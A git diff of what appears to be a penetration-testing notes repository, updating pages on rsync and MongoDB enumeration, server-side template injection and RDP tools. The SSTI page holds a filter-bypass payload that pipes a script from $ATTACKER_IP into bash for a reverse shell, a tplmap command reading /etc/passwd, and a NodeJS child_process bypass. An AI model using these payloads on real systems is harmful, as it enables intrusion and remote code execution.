diff --git a/Enumeration/rsync.md b/Enumeration/rsync.md
index f7fd55a..d875ac6 100644
--- a/Enumeration/rsync.md
+++ b/Enumeration/rsync.md
@@ -10,7 +10,9 @@ rsync <target-IP>::
 rsync <target-IP>::files
 rsync <target-IP>::files/foo/
 ```
+
 ### via netcat
+
 * Another way is the following
 ```sh
 nc -vn $TARGET_IP 873
@@ -30,6 +32,7 @@ nc -vn $TARGET_IP 873
 rsync <user>@<target-IP>::/files/foo/bar.txt .
 rsync -r <user>@<target-IP>::/files/foo .
 ```
+Use no credentials at all to connect anonymously.
 
 ## Uploads
 
diff --git a/Exploits/Databases/MongoDB.md b/Exploits/Databases/MongoDB.md
index d73b44d..7c786be 100644
--- a/Exploits/Databases/MongoDB.md
+++ b/Exploits/Databases/MongoDB.md
@@ -1,8 +1,26 @@
 # MongoDB
 
-* The cli tool is `mongo`
+* The cli tool is `mongo`, there is also `mongo-sh` as an alternative
 * [List Databases of the DBMS](https://www.mongodb.com/docs/manual/reference/command/listDatabases/)
 
+## List Databases
+
+```sh
+show dbs
+```
+
+## List Collections
+
+```sh
+show collections
+```
+
+## List Content of a Collection
+
+```sh
+db.<collection>.find().pretty()
+```
+
 ## List users
 
 ```sh
diff --git a/Exploits/Web/SSTI.md b/Exploits/Web/SSTI.md
index 258f610..759ba2c 100644
--- a/Exploits/Web/SSTI.md
+++ b/Exploits/Web/SSTI.md
@@ -2,6 +2,7 @@
 Pass in parameters to control the template.
 
 ## Usage
+
 * Sanity test
 ```python
 {{2+2}} 
@@ -23,6 +24,7 @@ Pass in parameters to control the template.
 ```
 
 ## Identification of Template Engine
+
 Identify via payload checking
 * Smarty: `a{*comment*}b`
 * Mako: `${"z".join("ab")}`
@@ -33,6 +35,7 @@ Identify via payload checking
 ```
 
 ## Tools 
+
 ### TPlmap
 ```sh
 git clone https://github.com/epinna/tplmap.git
@@ -50,6 +53,7 @@ tplmap -u http://<ip>:<port>/ -d '<vulnparam>' --os-cmd "cat /etc/passwd"
 ```
 
 ### Countermeasure
+
 * Remove everything in user input but alnum. Passing data, not data to f-string.
 ```python
 input = re.sub("[^A-Za-z0-9]", "", input)
@@ -58,7 +62,12 @@ return render_template_string(template, input=input)
 ```
 
 ## Bypass
+
 * Save reverse shell as `rev`
 ```sh
 {{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl $ATTACKER_IP:8000/rev | bash")|attr("read")()}}
 ```
+
+### NodeJS
+
+If functions like require are blacklisted and are  unusable, use [built-in objects](https://nodejs.org/api/globals.html) of NodeJS. Bypass by using `process` can be done instead, e.g. `process.mainModule.require('child_process').execSync('id');`.
diff --git a/Post Exploitation/Windows/Remote Desktop Protocol.md b/Post Exploitation/Windows/Remote Desktop Protocol.md
new file mode 100644
index 0000000..bc9edcf
--- /dev/null
+++ b/Post Exploitation/Windows/Remote Desktop Protocol.md	
@@ -0,0 +1,7 @@
+# Remote Desktop Protocol RDP
+
+## Tools to Connect
+
+* `xfreerdp`
+* `remmina`
+* If nothing else is working use `rdesktop`